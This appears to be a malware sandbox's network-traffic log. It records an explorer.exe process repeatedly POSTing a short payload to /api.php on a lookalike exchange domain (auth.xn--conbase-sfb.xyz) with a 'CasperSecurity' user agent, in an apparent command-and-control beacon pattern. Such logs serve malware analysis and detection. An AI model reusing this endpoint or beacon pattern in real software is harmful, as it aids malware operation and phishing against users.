Jul 6, 2024 13:27:34.017215014 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hc%2BsnTlY4358Iuvj68gSY6J6%2FlYTwJTYKTJY20bI6q%2BaJVsTo%2BpdbcpVhui0TU%2FXjjHA66Tvbdjs75k9V5Vh0X3ArZwylUi0FV05inHFlyxkakksq2gR6iNqx8Kwgu8gfMhxV087OsYAB0Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f0b684a42c6-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49783	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:34.133469105 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:34.138387918 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:34.881057024 CEST	615	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uHib%2Bu0YlKgK3bQFv5UindcB5YhIYmQNb9yrcEHKBSPIR6jyBzYPPG8M3wCHiwg4lOWLiIwWudf8Dqif4%2BXSxBUddzlF6ugC9D3TtHwbtIfIpMbRjleIbtj6RQuOkBCOsjtbv7YkjeC7UDY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f10f88b8c41-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49784	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:34.995620012 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:35.000462055 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:36.742166996 CEST	625	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=11ec6oRjdi2g9T%2F2LZzYvDioMBVnJsPbJgDmssUXFxNvB%2FDPNjCVpPNubOuU%2Bo%2FR8P%2BCTugd49NyJWZJzHSKVFK%2FfjTqQ7LnAGJu5%2B83GnwjYJYvNi46lYmz9eUVX9DfddtyHxCQ7RifCKk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f1649094255-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49785	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:36.852022886 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:36.857055902 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:37.582874060 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dCkBKnLvV82G7nFRv1YKMdHB2GlwtKOXk80dj0TxgdhI8iSSkXTn8FvS7r9L8RCXLEw2%2BAdpYqO0c8g1Cnin0kuMcc8PY%2FvoR3Z9c1N7KUbo3KXjo%2BafN9sBMAgVAu4%2FIWPbv3kjfLBZ3%2B8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f21ebf142e1-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49786	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:37.697215080 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:37.705058098 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:38.399193048 CEST	631	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YX7g%2F1KFo3BS08Kbx8J%2F%2FvI9NUhljP4zM82SPI%2BX7RHuZ6%2FvnHKwvw4%2BtGMoG8pu0%2BA4S6wegFwxqyejKIF%2FdGcSxM1dt4dD2y0rze68C3vd2OhvNJ%2FgT7LkCSxl3OkJQBKOzYXCr%2FOuLZc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f273c59c3ff-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49788	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:38.523776054 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:38.528986931 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:39.268532991 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KWrvsuuaCI%2FqVzSjyStQWJLwZ6mDeIYrClXowewpqiHK0Glkmee%2BUCa2IM0M84HwNutnU0w3r2EbNwMGKQMGoh9fO%2FztnfT5MnmK1jYGGH6FnkWBF%2BDxNjqZGEH9SPMHyoOamwAQ8%2BbXizY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f2c69980cac-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49789	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:39.422769070 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:39.429249048 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:40.121005058 CEST	617	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tpOPQHjyhYiPz5g3mFBc1fYbwyseD58JZRkui5vMeKsEd603X0pIBaVv%2BoBXzJhrZQzSQ%2FYQ19%2FPyOy4Vu19iGy1945EP2cQTfMh3FOCuTs2j3BD1ZlTaUbTZNnVwGRqoOengCjZuP9jNW4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f31ea825e6e-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49790	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:40.242398024 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:40.247250080 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:41.062048912 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bp5pszUMlCC83299P%2FgUJNjWd48aEeDu7VJ3GfS113dS4vtvov20iNrnCBWYKtwHDqORtCiVeGH6%2BbWS2119bDTAXFJf7x7EOlxQ6gWvdr8h0V5w3hPFELCV%2BrK2JNjt9G4NL8DVJuE1pdk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f373bfe426b-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49791	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:41.186031103 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:41.194437027 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:43.073749065 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KTDCPMdlFPrccNtPZPo%2FEpJPMYYJLN9RUceU%2BNztDs6TSHVMpDtVHHaKFxhUvi7PgAE2XKfl44NvF6mSiWL0%2FJEX3m706xQCjIikUyTehKriifpA0jKsY%2FRLSXMDjbAR%2BcoALeHOrU7VfjI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f3d0afe428b-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jul 6, 2024 13:27:43.295994997 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KTDCPMdlFPrccNtPZPo%2FEpJPMYYJLN9RUceU%2BNztDs6TSHVMpDtVHHaKFxhUvi7PgAE2XKfl44NvF6mSiWL0%2FJEX3m706xQCjIikUyTehKriifpA0jKsY%2FRLSXMDjbAR%2BcoALeHOrU7VfjI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f3d0afe428b-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49792	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:43.297660112 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:43.317035913 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:44.078346014 CEST	623	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UyDBLAnA5pMnNc7wmoRm58YcLJ6XH2rm6%2BOWX%2F3hGx0zLSSr4Zrcprf8YG9S%2B%2F9Wdjv6X3HC9dV4djmzhcz9raCWBzBzWrjy4QmCu9zJo6%2FnvAqJYjAZ%2BSNlj5j7q9zerZSedQu0CivbJ1Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f4a48de9e02-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49793	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:44.196265936 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:44.201091051 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:45.047868967 CEST	617	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aavehtfGwrkeZOer0eBm41sY4gHObrgT7PrLeeFvpHt1ITf%2FNTbOmk%2BYfCHfJ7EZv5JLxSGyRurStpeBZCJuRV%2FKlv1fQoJblgt2lZGLq19sYP22xUeEImm4TG9QGrJqIIyC6cLSn0CO8R0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f4fdc49c459-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49795	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:45.171914101 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:45.176906109 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:45.972578049 CEST	623	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=taB3vf0KDc1LZSAbYC%2BUSqtyLRGWs4a4uL%2B%2FMpU7zyZ3NvyZL8AI3cGu0SxtDiXZpzEgraXzEz4eK4eMzZPsVY6%2FaKYEfk3gF8tYKxr9idwSZ8fmoPSJcoif3g5ygJJNN%2Bt%2BSfLy7jrLbvM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f55efa50cc6-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49796	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:46.086304903 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:46.091159105 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:48.778719902 CEST	631	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ezz5iXtxJCOhNkFe3%2FkO%2FUvENmrJS3IBUbIAhjaf%2Bj7bSxRK4UcgOYqBaJmISI0iN%2BVLQ71L1obAurqJjMnnfw5saH%2Fpks%2Fn3NcXC%2FgfC%2BGabX1%2BSMe7O%2Fi8p5q6JthQxf1a6zG231SaGNM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f5b992f4333-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jul 6, 2024 13:27:48.779829025 CEST	631	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ezz5iXtxJCOhNkFe3%2FkO%2FUvENmrJS3IBUbIAhjaf%2Bj7bSxRK4UcgOYqBaJmISI0iN%2BVLQ71L1obAurqJjMnnfw5saH%2Fpks%2Fn3NcXC%2FgfC%2BGabX1%2BSMe7O%2Fi8p5q6JthQxf1a6zG231SaGNM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f5b992f4333-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jul 6, 2024 13:27:48.780510902 CEST	631	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ezz5iXtxJCOhNkFe3%2FkO%2FUvENmrJS3IBUbIAhjaf%2Bj7bSxRK4UcgOYqBaJmISI0iN%2BVLQ71L1obAurqJjMnnfw5saH%2Fpks%2Fn3NcXC%2FgfC%2BGabX1%2BSMe7O%2Fi8p5q6JthQxf1a6zG231SaGNM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f5b992f4333-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49798	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:48.899039984 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:48.903901100 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:49.763068914 CEST	627	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vjYPCu5%2BZW3SpsWRnO5GCAbp6SYf%2F19NN6VRAP77oILR%2B%2FP1eptWh%2FysSKuyDlN8D5Fp2iyJkA0%2FXTIEdfazsB0%2BcQ1nXHRMcv2EVfENy5bo%2BpsSu2wFht9msKNIVnV2uRuxsJzwZhwnjE0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f6d4e7342d2-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49799	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:49.884185076 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:49.890827894 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:50.598746061 CEST	617	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C11r874ekpYe5EV5bdOvT0xJMl4Jg%2F8QeME6HqWVDF1Qb1cBTyroPP8wZYj6o66IoMQlJPqWjYypxgtWQhKzDCie5wDa4QsU0Enkg5UqeRjeRCWZjO%2FqWc4FkbkNU%2FcNYJthM66MolQUHV8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f736e3a80d6-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49800	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:50.711307049 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:50.717628956 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:51.441332102 CEST	617	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uuKZ0Cwe%2BAPTmOUg5CEfI7VGe4RdZkxo%2FQUUjjO91yDW1b6IuKBUMhQ9MFZV17ualeuGfd2dkjfWAALMvfVDZkrQvS3ERwoKd%2BLDYBPS2H8Hlob6x6PuWJ1Vb2jxIY77zjLLUrZdxTIuQio%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f788ee243a5-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49802	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:51.556829929 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:51.561723948 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:52.313571930 CEST	623	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vrQ8nOqU8grV6dgcc4dsb%2BGP2laCGy5hut2SMbIIRDsXZx2b%2BRyPMfzEaK5eH2WEgJvokb9CWaULETpXNRy8Bwg5BY8xNzfmBvTrULJqOGh%2FOQ7lB%2BhSrKJqpQYklME0%2BjPYta0ryD3OQ%2B4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f7ddc710c80-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49803	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:52.431545019 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:52.437067986 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:53.168668985 CEST	625	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vy3%2BY7yaTol2SbE9ziRo%2FrJb%2FSYllCIQq38LF6GvB%2BD0IV%2BM6xoRZmJ8bW67bCt3Jt%2F7fEFo9I8j8Vqiwp8RI4nSE56CSx6KsI7JiWyEg%2FlrCBPIpm5nbW59iGJpECBWKaaeLatqrQsP99o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f833b244213-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49804	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:53.289576054 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:53.295018911 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
